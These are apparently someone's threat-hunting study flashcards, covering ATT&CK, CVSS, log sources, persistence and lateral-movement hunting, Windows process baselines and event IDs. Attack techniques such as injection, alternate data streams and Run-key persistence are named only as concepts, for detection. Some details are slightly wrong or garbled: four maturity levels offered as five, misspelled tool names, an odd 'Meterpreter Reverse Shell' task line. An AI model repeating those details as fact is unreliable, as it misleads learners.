Threat Hunting 101

Question 1

Prerequisites for Threat Hunting?

Answer 1

• SANS “Top 20” CIS Critical Security Controls is a good place to start
• Minimum requirements:
  ■ inventory of systems, networks, software
  ■ Baseline before an incident: know what’s “normal” network
  ■ An incident response plan in place BEFORE an incident
  ■ A list of known privileged accounts
  ■ Know where your sensitive data is located

Question 2

Threat Hunting Frameworks?

Answer 2

MITRE ATTACK
Lockheed Martin’s Cyber Kill Chain
Fireeye’s Attack Lifecycle
Gartner’s Cyber Attack Model

Question 3

Should I move from left to right when using the ATT&CK Framework while executing my exercise?

Answer 3

there is no specific order
Use the ATT&CK to support your hypothesis.
iIf you don’t have a hypothesis, start your threat-hunting where high-risk and first impact areas are, then work from a top-down.

Question 4

Threat hunting should be focused, how?

Answer 4

■ Logs that matter
■ Common patterns used by attackers
■ Get a tangible result
■ Improving technique with each iteration of the hunt

Question 5

What Do You Need to Start Threat Hunting?

Answer 5

• automated blocking and monitoring tools such as firewalls,
• antivirus, endpoint management
• network packet capture
• SIEM
• Threat intelligence

Question 6

Some Threat Hunting Tools?

Answer 6

• Sqrrl - APT detection platform. Combines Link Analysis and UBA
• Sysmon
• FireEye-Redline
• Volatility
• Malware-Traffic- Analysis.net
• Windows Event Forwarding
• Bricata
• Cortex XDR

Question 7

What is an effective cyber threat hunting process?

Answer 7

non-signature-based detection
anomaly- and behavior-based analytics
external threat intelligence sources

Question 8

Why an analyst would start to correlate data and determine if there is cause for further investigation?

Answer 8

examining various sources of data, such as authentication logs or traffic flow

Question 9

What are the 5 HMM levels?

Answer 9

HM1: Rely on IDS, Collects info from systems, Use Threat Intel feeds, Hunt is manually
-
HM2: Incorporate hunt techniques from external sources, Collect data from systems, Active approach
-
HM3: Analyze different data,, , Machine learning, Publish hunting procedures, Identify patterns in alerts
-
HM4: HM3 capabilities + Automate tactical-level analysis, Scripts and Programs based on intelligence, Analysts can focus on creating new hunt methods

Question 10

The hunting cycle is a four-stage loop ?

Answer 10

Hypothesize
Investigate
Uncover
Inform and Enrich

Question 11

Examples of a pattern or the attacker’s TTP?

Answer 11

specific registry key modifications

Question 12

The steps of the Hunt-Uncover stage?

Answer 12

Investigate specific IOCs
Link various IOCs
TTPs discovered are shared

Question 13

The steps in the Inform and Enrich stage?

Answer 13

• Use knowledge from Uncover stage to reduce risk and simplify future hunts
• Document hunting cycle result
• Automate hunting repeatable tasks
• Create signatures and rules for threat detection systems using new findings.

Question 14

What three aspects are vulnerabilities evaluated under?

In CVSS

Answer 14

• Base group: characteristics of a vulnerability that are constant over time
  *
• Temporal Group: assesses the vulnerability as it changes over time
  *
• Environmental Group: characteristics of a vulnerability, taking into account the organizational environment.

Question 15

How scoring works for the Base Group - CVSS?

Answer 15

0 - 10

0 the least severe

Question 16

The base group Exploitability matrix?

Answer 16

• Attack Vector - Scope
• Attack Complexity - Confidentiality
• Privilege Required - Integrity
• User Interaction - Availability

Question 17

The temporal group Exploitability matrix?

Answer 17

• Exploit Code Maturity (E)
• Remediation Level (RL)
• Report Confidence (RC)

Question 18

What is the importance of CVSS?

Answer 18

Reports 
- vulnerability severity
- urgency
- priority of response. 
Note: 
Does not calculate the chances of being attacked, but the chances of being compromised when attacked and potential damage.

Question 19

How CVSS is used in Threat Hunting?

Answer 19

• prioritize remediation efforts.

- identify how vulnerabilities are used

Question 20

Maintenance and Guidance of CVSS?

Answer 20

FIRTS (Forum for Incident Respoonse and Security Teams)

Question 21

What are the conditions for a Hot Thread to be recorded in the database?

Answer 21

• Newly disclosed vulnerability with a CVSS base score of high (7.0 or greater).
  *
• Intelligence indicating attacks targeted at specific customers (from Talos, open source intel-sharing forums, ISACs and law enforcement)
  *
• Native intelligence: Growing evidence of a campaign developing on customers’ sites, a surge in reliable and high fidelity security alerts, or due to an opaque priority request to place vigilance in monitoring specific network zones for a specified time period

Question 22

Threat Awareness Resources?

Answer 22

• OWASP
• Spamhaus Project
• Alexa and the GoatRider tool(Website traffic analysis)
• Farsight Security’s DNSDB

Question 23

Threat Intelligence Sources?

Answer 23

• Malware detection and analysis sites
• Web content verification sites
• Network utilities
• Scripting Decoding Utilities
• Blogs and Feeds

Question 24

What three aspects of an attack should a hunter look into?

Answer 24

• Infection Vector
• Persistence
• Lateral Movement

Question 25

Open source Threat Hunting tools for smaller organizations or doing it on your own?

Answer 25

Host, Network, and Log Data:
GRR, SysMon, Bro, WinBeat

Storage and Analytics:
ELK Stack: Elastic, Logstach, Kibana

Infrastructure:
Puppet, Chef, Docker

Question 26

Threat Hunting Skills?

Answer 26

Offensive Skills

Network Analysis - Host Analysis

Malware Analysis - Memory Analysis

Most importantly

• Investigative mind
• Attacker mindset
• Patience to work long hours to complete a TH exercise
• Continuously search for new threats and
• Open to use new tools or create them.

Question 27

Attack Scenario - Infection Vector

Answer 27

External
Delivery Method: Phishing - External Download
Exploit Method: Office Macro - PDF Vulnerability

Internal
Delivery Method: USB - Network Share
Exploit Method: Native Executable - HTA

Question 28

Elements of hypotheses for the areas to look into?

i.e Infection vector, Persistence, and Lateral Movement.

Answer 28

• What data I need?
• How do I get it?
• How do I hunt through that data?

Question 29

• What data I need?
• How do I get it?
• How do I hunt through that data?

Answer 29

External Vectors / Perimeter Logs

• Bro logs
• Email and Proxy logs

Internal Vectors

• Process Data
• Registry
• Windows Events

Question 30

Delivery Vector - Phishing - Office Macro Exploit used

What data do I need?

Answer 30

• Process execution data
• Enhanced Powershell logging
• Email logs

Question 31

• Process execution data
• Enhanced Powershell logging
• Email logs
  Where do I get the data from?

Answer 31

• Sysmon/OSquery
• Windows Event logs
• Email Servers

Question 32

• Sysmon/OSquery
• Windows Event logs
• Email Servers
  How to hunt through this data?

Answer 32

• Searching Office programs launching Powershell
• Command arguments w/encoded command
  Then query Kibana for that data to get a visualization for that pattern and attack

Question 33

How do attacker establish Persistence?

Answer 33

Traditional
- Run keys - Services - Scheduled Tasks

Creative/Stealthy

• Office Templates
• Hijacking Windows features (Applnit DLLs/Accessibility features)

Host Analysis skills

Question 34

Persistence example - RUN KEYS
What data is needed?
Where to get the data from?
How to hunt through the data?

Answer 34

What? 
Registry Run Key locations
Run, RunOnce, RunOnceEX
Where? 
Powershell script
Group policy to deploy 
Collect to Elastic
How?
Grouping of executable in run key values
Grouping of executable paths
Command line commands/Arguments
Hashing
First seen/last run

Question 35

Lateral Movement

Two key areas to look into for evidence?

Answer 35

Recon
DNS Zone Transfers, LDAP Enumeration, Port Scanning

Access
PSExec - RDP - PS Remoting

Question 36

Recon
DNS Zone Transfers, LDAP Enumeration, Port Scanning

Access
PSExec - RDP - PS Remoting

Where do I find the data?

Answer 36

• WVT logs
• Bro/Network logs
• Enumeration artefacts
• IDS log parsing

Question 37

Four Primary Threat Hunting Techniques?

Answer 37

Searching
Clustering
Grouping
Stack Counting

Question 38

Datasets - Endpoint Data?

Answer 38

Process execution metadata
Registry access data
File data
Network data
File prevalence

Question 39

Datasets - Network Data?

Answer 39

Network session data 
Bro logs
Proxy logs 
DNS logs
Firewall logs 
Switch and Router logs

Question 40

Datasets - Security Data?

Answer 40

Threat Intelligence
Alerts
Friendly Intelligence

Question 41

Lateral Movement - Attack Scenario
What data do I need?
Where to get it from?
How to hunt through it?

Answer 41

What?
WVT
Bro logs

Where?
WinBeat parsing
Collect to Elastic

How? 
• Anomalous user/service logins
• High count ‘one to many’ connections
• Traffic on LDAP ports 
• Session types/privileges

Question 42

How Do You Know What to Look For?

Answer 42

Set some prioritized intelligence requirements (PIRs)

Question 43

What is threat hunting?

Answer 43

“the process of proactively and iteratively searching through networks to detect and isolate advanced threats that evade existing security solutions”

Sqrrl defined

Question 44

Examples of Fileless Malware and Techniques?

Answer 44

Code injection

API Hooking

Question 45

How to deal with huge data sets?

Answer 45

Machine Learning

ex. Lateral Movement Data Sets

Question 46

What is so interesting in the Threat Hunter role?

Answer 46

It builds, maintains, and improves defensive and offensive skills.
Gets involved in Machine Learning and scripting

Question 47

What is Atomic Red Team?

Answer 47

Red Team tests are small, highly portable detection tests mapped to the MITRE ATT&CK Framework.

Question 48

MITRE ATTACK ?

Answer 48

MITRE ATTACK™ is a knowledge base

• model cyber adversaries’ tactics and techniques
• shows how to detect or stop them

Question 49

Threat Hunting Use Cases?

Answer 49

Anomaly-based detection as a good first start. Identifying interesting or unaccountable items in a SEIM
- ssh logins at 1 am
- Consistent ICMP traffic to unknown IPs
This will help give a good starting point to hunt for threats,

Additionally

• Anonymizing VPNs/Tor from inside the network
• Logins from strange locations
• More than one remote connection at the same time for the same user or being logged in locally and remotely at the same time.

Question 50

What is the primary difference between threat hunting and penetration testing?

Answer 50

Penetration testing, you are taking an outside-in approach. But with threat hunting, this is much more of an inside-out approach.

• the assumption (or more specifically, the hypothesis) that an adversary could already be inside your IT Infrastructure. Thus, you are taking steps to ascertain that. If your hypothesis is indeed confirmed, you then will try to mitigate them so that they can’t get in again.

Question 51

What happens if I don’t find anything in the threat-hunting exercise that I have just engaged in?

Answer 51

There is a very good chance that you will discover other kinds of security vulnerabilities which you thought never existed before.

Question 52

Should I just pick any random area of the ATT&CK framework to start my threat-hunting exercise?

Answer 52

• First analyze the log files and the respective warnings/ alerts to see what trouble points exist.
• You also need to make sure that you have access permissions for resources which you need for hunting .
  example: Don’t search for account manipulation adversaries if the access permissions and tools are not in place first.

Question 53

Should I move from left to right when using the ATT&CK Framework while executing my exercise?

Answer 53

Don’t have to address each and every cyber-related issue in the framework, and don’t feel overwhelmed by it.

Use the ATT&CK as a support for hypothesis and start from there. If you don’t have a hypothesis at first, start threat-hunting where high-risk and first impact areas are then work from a top-down approach from there.

Question 54

privilege escalation. What should a threat hunter look for in these instances?

Answer 54

• look into any known gaps or weaknesses that currently exist
• an EDR solution would be the most beneficial technique.
• File Integrity Monitoring
  If there are any suspicious changes to files, a history of employee logins must be examined for any types of anomalous behaviors.
• misconfiguration, as this is another backdoor for the cyberattacker.

Question 55

What are the two primary types of threat-hunting exercises?

Answer 55

• On-Demand Investigation Mode: used by security teams to investigate any suspicious or anomalous activities after they have been detected.
• Continuous Monitoring or Testing Mode: continuously monitoring and/or testing their security posture to proactively identify and investigate any suspicious events.

Question 56

How would you specifically describe data leakage?

Answer 56

the departure of a data packet from the place where it was intended to be stored.

Question 57

top sources of data leakage?

Answer 57

• Users
• misconfigurations
• Web-based application developed using insecure source code
• Inadequate security controls

Question 58

How to detect Privilege Escalation?

Answer 58

• EDR solution
• File Integrity Monitoring (or FIM for short)
• Employee logins must be examined for any types of anomalous behaviors.
• Misconfigured systems

Question 59

Should threat hunting be conducted in one part of an infrastructure, or multiple areas?

Answer 59

Multiple areas for a comprehensive results.

Question 60

Where are the Visibility Points?
Where/what are the detection points?
Where to setup sensors?

Answer 60

Traffic at all major points
(CoreSwitch-Where VLANS are trunked, Firewalls and their ports, InternetPorts, EdgeRouters)

System logs that control access

• VPN
• 2FA
• O365/Azure

Security Tools
AV, Firewalls, IPS

Question 61

Logging Sources?

Answer 61

NGFW, WAF

Entry Points
- VPN, RemoteAccess, EdgeRouters, Wi-Fi

DirectoryAuthenticationServices
- ActiveDirectory, Azure/O365, IM, 2FA

Protection/Detection Tools

• IPS/IDS
• AV/HIPS
• Network Sensors

Email

Question 62

Network bandwidth/traffic monitoring tools?

Answer 62

• PRTG
• TCPdump
• NTOP
• Nagios

Note: Used for anomaly detection

Question 63

The Components of a Hypothesis Template

Answer 63

• Tactic and Technique
• Procedure
• Collection Requirements
• Scope
• Exclusions
• Analysis Plan

Question 64

SIEM use for Threat Hunting?

Answer 64

Anomaly Detection uses

• anomalous login activity
• Anomalous blocking by firewalls
• Anomalous denied access events

Question 65

How to tell if a Windows Core Process is legitimate ?

Answer 65

• expected parent process spawn it?
• running out of the expected path?
• spelled correctly?
• running under the proper SID?
• signed by Microsoft?

Question 66

What is SMSS.EXE is known as the Session Manager.

Answer 66

Responsible for creating new sessions.

Question 67

smss. exe
- Executable path?
- Parent Process?
- Username?
- Base Priority?
- Time of Execution?

Answer 67

Executable Path: %SystemRoot%\System32\smss.exe
Parent Process: System
Username: NT AUTHORITY\SYSTEM (S-1-5-18)
Base Priority: 11
Time of Execution: For Session 0, within seconds of boot time

Question 68

What’s the function of CSRSS.EXE (Client/Server Run Subsystem Process)?

Answer 68

• managing processes and threads
• making Windows API available for other processes
• mapping drive letters, create temp files,
• handles the shutdown process

Question 69

CSRSS.exe

• Executable path?
• Parent Process?
• Username?
• Base Priority?
• Time of Execution?

Answer 69

Executable Path: %SystemRoot%\System32\csrss.exe
Parent Process: Created by child instance of SMSS.EXE but that process will exist so will appear as no parent
Username: NT AUTHORITY\SYSTEM (S-1-5-18)
Base Priority: 13
Time of Execution: For Sessions 0 & 1, within seconds of boot time

Question 70

What is Baselining?

Answer 70

A file that will be used for comparisons against current settings and/or configurations.
Compare the current state of a machine, file system, etc. against the baseline to determine anything out of place.

Question 71

Tools for monitoring unauthorized changes to files?

Answer 71

TripWire
SolarWinds
AlienVault
TrustWave
LogRhythm

Question 72

Baselining Tools ?

Answer 72

• System Center Configuration Manager (SCCM)
  
  • Powershell (Desired State Configuration feature)
    
    • cmdlet: (Compar-Object. Get-Service, Get-Process)
  • Microsoft Security Compliance Manager (SCM)

Same as Puppet, Ansible, or Chef

Question 73

What shoudl be baselined?

Answer 73

• Accounts on a system (user or service)
• Local administrators on a system
• Folder permissions
• Folders contents
– Tasks folder (scheduled tasks)
– Network folders containing internal install executables & files

Question 74

How is Malware Delivered ?

Answer 74

Physical media
    Email (attachments)
    URL links
    Drive-by downloads
    Web advertising
    Social media
    File shares
    Software vulnerabilities

Question 75

What are the Malware Evasion Techniques?

Answer 75

Alternate Data Streams

Injections

Masquerading 

Packing/Compression (Yoda Packer and UPX)

Recompiling

Obfuscation

Anti-reversing Techniques

Question 76

How are Alternate Data Streams created and viewed?

Answer 76

Create Streams by:

• CreateFile Windows API
• WriteFile Windows API

To View ADS
Streams-Sysinternals OR PowerShell’s cmdlet Get-Item

Question 77

Examples of Injections and how they work?

Answer 77

DLL Injection 
(Windows API CreateRemoteThread()) + others 
Reflective DLL Injection
(Metasploit, PowershellEmpire, C/C++) 
PE Injection
Thread Hijacking

Question 78

What is Anti-reversing Techniques and how they work?

Answer 78

• Detect that malware is being run in a virtual machine
• Detect that a debugger is attached to the malware
• Junk code can be inserted into the malware as misdirection

Question 79

Examples of Maleware Persistance?

Answer 79

Autostarts 
    Scheduled Task
    COM Hijacking
    DLL Hijacking 
    Windows Services

Question 80

Autostart Locations ?

Answer 80

• HKLM\Software\Microsoft\Windows\CurrentVersion\Run
• HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\Run
• HKCU\Software\Microsoft\Windows\CurrentVersion\Run
• HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer\Run

To find Autostart locations: AutoRuns - SysInternals

Question 81

Examples of DLL Hijacking?

Answer 81

• Search Order
  
  • Phantom DLL
  • Side Loading

Question 82

Examples of Windows Services?

Answer 82

• Service Creation (Created by “sc” command
  
  • Service Replacement
  • Service Recovery

Question 83

Malware Detection Tools?

Answer 83

PE Capture
ProcScan
Meterpreter Payload Detection
Reflective Injection Detection

Question 84

Detection Techniques?

Answer 84

• Fuzzy Hashing (Used by VirusTotal)
  
  • Import Hashing (Used by VirusTotal)
  • Execution Tracing

Question 85

Memory Aanlysis Tools?

Answer 85

• Mandiant’s (FireEye) Redline

* Volatility

Question 86

Windows Event Logs path?

Answer 86

%SYSTEMROOT%\System32\Winevt\Logs

Question 87

Event log location in the registry?

Answer 87

HKLM\SYSTEM\CurrentControlset\Services\Eventlog

Question 88

Why are event logs important?

Answer 88

• logons that failed or that were successful.
• changes to user permissions.
• system services that were created, started, or stopped.
• changes to the audit policy.
• specific application usage.
• events generated by installed applications, such as
AV.

Question 89

What is done If the the Event information is not clear?

Answer 89

Events and Errors Message Center

Question 90

Windows Event IDs that should be

monitored ?

Answer 90

Hunting Suspicious Accounts - Event ID 4720 (Account Created)
• 4624 (successful logon)
• 4648 (logon using explicit credentials)
• 4625 (failed logon)
• 4634 (successful logoff)
• 4647 (user initiated logoff)

Question 91

Windows Event Logs Hunting Events?

Answer 91

Suspicious Account Events
Password Attacks
Golden Ticket (Kerberos)
RDP Sessions
Scheduled Tasks
Service Creation
Log Rotation Clearing 
Psexec

Question 92

Windows Event Logs logging tools?

Answer 92

• Sysmon
  (sysmonconfig-export.xml - SwiftOnSecurity)
• SIEM

Question 93

Tasks?

Answer 93

• conduct basic static analysis using Merterpreter Reverse Shell (binwalk, ExifTool, and MD5deep) - Kali Linux on some malware found on the internal network ( Analyze and Classify Malware)

Question 94

Where Behavioral Detection and Machine Learning fails?

Answer 94

When trusting/benchmarking an already compromised environment .